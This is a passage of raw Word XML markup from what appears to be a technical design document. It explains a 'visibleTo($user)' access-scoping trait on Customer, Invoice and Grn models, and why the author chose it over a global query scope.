      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> trait on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer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Invoice</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Grn</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providing </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>visibleTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>($user</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p>
    <w:p w14:paraId="50363FC2" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="189"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Two decisions worth stating:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38CDF7" w14:textId="43B94CE9" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="51"/>
        <w:ind w:left="312" w:right="16" w:hanging="208"/>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4848" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BEE6C06" wp14:editId="14B30337">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4656832</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1276350" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25905" name="Group 25905"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1276350" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1276350" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="920" name="Shape 920"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1276350" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269456" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275419" y="4651"/>
                                  <a:pt x="1276350" y="6896"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="135979"/>
                                  <a:pt x="1275419" y="138224"/>
                                  <a:pt x="1273560" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="141945"/>
                                  <a:pt x="1269456" y="142875"/>
                                  <a:pt x="126682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EEEB638" id="Group 25905" o:spid="_x0000_s1026" style="position:absolute;margin-left:366.7pt;margin-top:12.05pt;width:100.5pt;height:11.25pt;z-index:-251461632" coordsize="12763,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&#10;">
                <v:shape id="Shape 920" o:spid="_x0000_s1027" style="position:absolute;width:12763;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="12763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AWwAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CLOzNphZWtBpFFhYET1UPHsdmbKvNpCRp7f77zUHw+Hjf6+1oWjGQ841lBbMkBUFcWt1w&#10;peB8+p0uQPiArLG1TAr+yMN28zFZY67tkwsajqESMYR9jgrqELpcSl/WZNAntiOO3M06gyFCV0nt&#10;8BnDTSuzNJ1Lgw3Hhho7+qmpfBx7o+CRSj1ciuv3fd4uil6Oh6zvnFJfn+NuBSLQGN7il3uvFSyz&#10;OD+eiUdAbv4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAy6rAFsAAAADcAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m9525,l1266825,v2631,,4875,930,6735,2791c1275419,4651,1276350,6896,1276350,9525r,123825c1276350,135979,1275419,138224,1273560,140084v-1860,1861,-4104,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,127635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5872" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="328F1113" wp14:editId="358ED34E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1904107</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>334057</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="809625" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25906" name="Group 25906"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="809625" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="809625" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="924" name="Shape 924"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="809625" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4651"/>
                                  <a:pt x="809625" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="126454"/>
                                  <a:pt x="808695" y="128699"/>
                                  <a:pt x="806835" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="132420"/>
                                  <a:pt x="802730" y="133350"/>
                                  <a:pt x="800100"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036153F" id="Group 25906" o:spid="_x0000_s1026" style="position:absolute;margin-left:149.95pt;margin-top:26.3pt;width:63.75pt;height:10.5pt;z-index:-251460608" coordsize="8096,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3MSgMAAJ4JAAAOAAAAZHJzL2Uyb0RvYy54bWykVttunDAQfa/Uf0C8N9x2CaDsRmpzeana&#10;qEk/wGvMggQY2d5bv77jARvYjaI2ycPGeObM5cx47JvbY1M7eyZkxduVG1z5rsNayvOq3a7c3y8P&#10;XxLXkYq0Oal5y1buiUn3dv35082hy1jIS17nTDhgpJXZoVu5pVJd5nmSlqwh8op3rAVhwUVDFHyK&#10;rZcLcgDrTe2Fvh97By7yTnDKpITdu17ortF+UTCqfhaFZMqpVy7EpvBX4O9G/3rrG5JtBenKig5h&#10;kHdE0ZCqBafW1B1RxNmJ6sJUU1HBJS/UFeWNx4uiogxzgGwC/yybR8F3HeayzQ7bztIE1J7x9G6z&#10;9Mf+UXTP3ZMAJg7dFrjAL53LsRCN/g9ROkek7GQpY0flUNhM/DQOl65DQRREUbQcKKUl8H6BouX9&#10;mzjPOPVmoRw6aA455i8/lv9zSTqGtMoM8n8STpWv3DRcuE5LGmhSVHD0BpKCWpYimUlg62P82DxJ&#10;RndSPTKORJP9d6n6jszNipRmRY+tWQro6zc7uiNK43SUeukcxkqVtlBa2vA9e+Gop3S50qWupqkz&#10;xDkq1O1UMfGhX+FETVSNAt1tKvqV/Zmrh9fRRB3iQn+Jv0ive48pyDF5I4mTqJeE12mgRRDO3Pb8&#10;y+CSOO1xi3iJuNFZ36wQc5yk8dybFSEFr3kz+Rk/FhGEUQK09Rij9XpsE0y8WGKDjdHZwIMQluk8&#10;PstGEPnLJQr/kQ/LcBCFi/CMZFuW6ek1GdoSj8ILnybfHmP7Z4YwOq9xApXoqzUiDCNQv75lLgOH&#10;ljCi/2JDN5nu2UuGzf55Wcz+pMTzNExyPQG9+qSHjHgOmiqf96KJ8bx9bc7/dR4siWfny/I+awhb&#10;P9y9KDatuWR9n+u5gkfSzhrUHqdZ3eqxA3xQAhd7UROFN2RTKbjx66rRRbj2YYaYcwPW9KTvxyuu&#10;1KlmejbV7S9WwJTGW0hvSLHdfKuFsyf6Xsc/NE7qriTD7mB3UMVQ0Y7GF1VdW5MBQmcm7+8ewgcc&#10;EJDUoKxxDJ8UFun3SDpE078r4HaGpM3rAvAWhJ55qyy+hTcRhjnJVi83PD/hjYyEwNWH1OAjAPMY&#10;Hiz6lTH9Rq3xWbX+CwAA//8DAFBLAwQUAAYACAAAACEAxfzJceEAAAAJAQAADwAAAGRycy9kb3du&#10;cmV2LnhtbEyPQU+DQBCF7yb+h82YeLMLtKWCLE3TqKemia2J8TaFKZCys4TdAv33ric9Tt6X977J&#10;1pNuxUC9bQwrCGcBCOLClA1XCj6Pb0/PIKxDLrE1TApuZGGd399lmJZm5A8aDq4SvoRtigpq57pU&#10;SlvUpNHOTEfss7PpNTp/9pUsexx9uW5lFASx1NiwX6ixo21NxeVw1QreRxw38/B12F3O29v3cbn/&#10;2oWk1OPDtHkB4WhyfzD86nt1yL3TyVy5tKJVECVJ4lEFyygG4YFFtFqAOClYzWOQeSb/f5D/AAAA&#10;//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEn5LcxKAwAAngkAAA4AAAAAAAAAAAAAAAAALgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMX8yXHhAAAACQEAAA8AAAAAAAAAAAAAAAAA&#10;pAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACyBgAAAAA=&#10;">
                <v:shape id="Shape 924" o:spid="_x0000_s1027" style="position:absolute;width:8096;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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AhxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heYK3uqlIqdFV0kBLoKfGSHt8ZJ/Z0OzbkN1q9Nd3CwWPw8x8w2z3o+3EmQbfOlbwuEhA&#10;ENdOt9woqA6vD88gfEDW2DkmBVfysN9NJ1tMtbvwB53L0IgIYZ+iAhNCn0rpa0MW/cL1xNE7ucFi&#10;iHJopB7wEuG2k8skeZIWW44LBnvKDdXf5Y9VsLqZ97evvKiO7rMo9TXPyL5kSs1nY7YBEWgM9/B/&#10;u9AK1ssV/J2JR0DufgEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBtksAhxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l800100,v2630,,4875,930,6735,2791c808695,4651,809625,6896,809625,9525r,114300c809625,126454,808695,128699,806835,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434D232A" wp14:editId="014AD535">
                <wp:extent cx="38100" cy="38100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="25904" name="Group 2590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16" name="Shape 916"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="38100" cy="38100"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="38100" h="38100">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="21576" y="0"/>
                                  <a:pt x="24006" y="484"/>
                                  <a:pt x="26340" y="1451"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="28674" y="2418"/>
                                  <a:pt x="30734" y="3795"/>
                                  <a:pt x="32520" y="5581"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34307" y="7361"/>
                                  <a:pt x="35683" y="9420"/>
                                  <a:pt x="36650" y="11757"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="37617" y="14089"/>
                                  <a:pt x="38100" y="16520"/>
                                  <a:pt x="38100" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="38100" y="21580"/>
                                  <a:pt x="37617" y="24005"/>
                                  <a:pt x="36650" y="26336"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35683" y="28668"/>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68"/>
                                  <a:pt x="1450" y="26336"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="483" y="24005"/>
                                  <a:pt x="0" y="21580"/>
                                  <a:pt x="0" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="16520"/>
                                  <a:pt x="483" y="14089"/>
                                  <a:pt x="1450" y="11757"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9420"/>
                                  <a:pt x="3793" y="7361"/>
                                  <a:pt x="5580" y="5581"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3795"/>
                                  <a:pt x="9426" y="2418"/>
                                  <a:pt x="11760" y="1451"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14094" y="484"/>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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5C647F73" id="Group 25904" o:spid="_x0000_s1026" style="width:3pt;height:3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line"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&#10;">
                <v:shape id="Shape 916"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kFnxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvgb6D2EJviewUktaNEkKh0EsD+emht8XaWqqtlZHU2H37KhDIcZiZb5jVZnSdOFOI1rOCclaA&#10;IK69ttwoOB3fpk8gYkLW2HkmBX8UYbO+m6yw0n7gPZ0PqREZwrFCBSalvpIy1oYcxpnvibP37YPD&#10;lGVopA44ZLjr5LwoFtKh5bxgsKdXQ3V7+HUKdqWVbRset42Zf+x+7LD/+lyOSj3cj9sXEInGdAtf&#10;2+9awXO5gMuZfATk+h8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAb5kFnxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m19050,v2526,,4956,484,7290,1451c28674,2418,30734,3795,32520,5581v1787,1780,3163,3839,4130,6176c37617,14089,38100,16520,38100,19050v,2530,-483,4955,-1450,7286c35683,28668,34307,30733,32520,32519v-1786,1786,-3846,3163,-6180,4130c24006,37616,21576,38100,19050,38100v-2526,,-4956,-484,-7290,-1451c9426,35682,7366,34305,5580,32519,3793,30733,2417,28668,1450,26336,483,24005,,21580,,19050,,16520,483,14089,1450,11757,2417,9420,3793,7361,5580,5581,7366,3795,9426,2418,11760,1451,14094,484,16524,,19050,xe" fillcolor="#152235" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,38100,38100"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A trait with an explicit call site, not a global scope.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A global scope would silently filter every query in the application including reports and background </w:t>
      </w:r>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>work and</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
